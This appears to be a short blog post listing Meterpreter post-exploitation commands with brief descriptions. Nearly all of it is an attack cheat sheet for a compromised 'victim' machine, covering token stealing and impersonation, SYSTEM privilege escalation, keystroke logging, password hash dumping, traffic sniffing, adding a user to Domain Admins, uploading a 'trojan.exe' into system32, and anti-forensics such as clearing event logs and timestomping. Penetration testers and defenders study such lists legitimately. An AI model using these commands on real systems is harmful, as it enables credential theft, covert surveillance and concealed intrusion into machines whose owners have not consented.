Here is a list with some Meterpreter commands that can be used for post exploitation.
- screengrab
Screenshot from victims computer
- run scriptname
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory
- sysinfo
Show the system information on the remote target
- ls
List the files and folders on the target
- use priv
Load the privilege extension for extended Meterpreter libraries
- use incognito
Load incognito functions. (Used for token stealing and impersonation on a target machine)
- list_tokens -u
List available tokens on the target by user
- list_tokens -g
List available tokens on the target by group
- impersonate_token DOMAIN_NAME\\USERNAME
Impersonate a token available on the target
- steal_token PID
Steal the tokens available for a given process and impersonate that token
- drop_token
Stop impersonating the current token
- getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors
- shell
Drop into an interactive shell with all available tokens
- execute -f cmd.exe -i
Execute cmd.exe and interact with it
- execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens
- execute -f cmd.exe -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process
- rev2self
Revert back to the original user you used to compromise the target
- reg command
Interact, create, delete, query, set, and much more in the target’s registry
- setdesktop number
Switch to a different screen based on who is logged in
- screenshot
Take a screenshot of the target’s screen
- keyscan_start
Start sniffing keystrokes on the remote target
- keyscan_dump
Dump the remote keys captured on the target
- keyscan_stop
Stop sniffing keystrokes on the remote target
- getprivs
Get as many privileges as possible on the target
- hashdump
Dump all hashes on the target
- use sniffer
Load the sniffer module
- sniffer_interfaces
List the available interfaces on the target
- sniffer_dump interfaceID pcapname
Start sniffing on the remote target
- sniffer_start interfaceID packet-buffer
Start sniffing with a specific range for a packet buffer
- sniffer_stop interfaceID
Stop the sniffer
- add_user username password -h ip
Add a user on the remote target
- add_group_user “Domain Admins” username -h ip
Add a username to the Domain Administrators group on the remote target
- clearev
Clear the event log on the target machine
- timestomp
Change file attributes, such as creation date (antiforensics measure)
- reboot
Reboot the target machine
- help
The ‘help’ command, as may be expected, displays the Meterpreter help menu.
- background
The ‘background’ command will send the current Meterpreter session to the background and return you to the msf prompt. To get back to your Meterpreter session, just interact with it again.
- ps
The ‘ps’ command displays a list of running processes on the target.
- Migrate PID
Using the ‘migrate’ post module, you can migrate to another process on the victim. Migrate to the specific process ID (PID is the target process ID gained from the ps command)
- ls
The ‘ls’ command will list the files in the current remote directory.
- download
The ‘download’ command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path.
- upload
As with the ‘download’ command, you need to use double-slashes with the ‘upload’ command.
meterpreter > upload trojan.exe c:\\windows\\system32
- ipconfig
The ‘ipconfig’ command displays the network interfaces and addresses on the remote machine.
- getuid
Running ‘getuid’ will display the user that the Meterpreter server is running as on the host.
- execute
The ‘execute’ command runs a command on the target.
- shell
The ‘shell’ command will present you with a standard shell on the target system.
- idletime
Running ‘idletime’ will display the number of seconds that the user at the remote machine has been idle.
No comments:
Post a Comment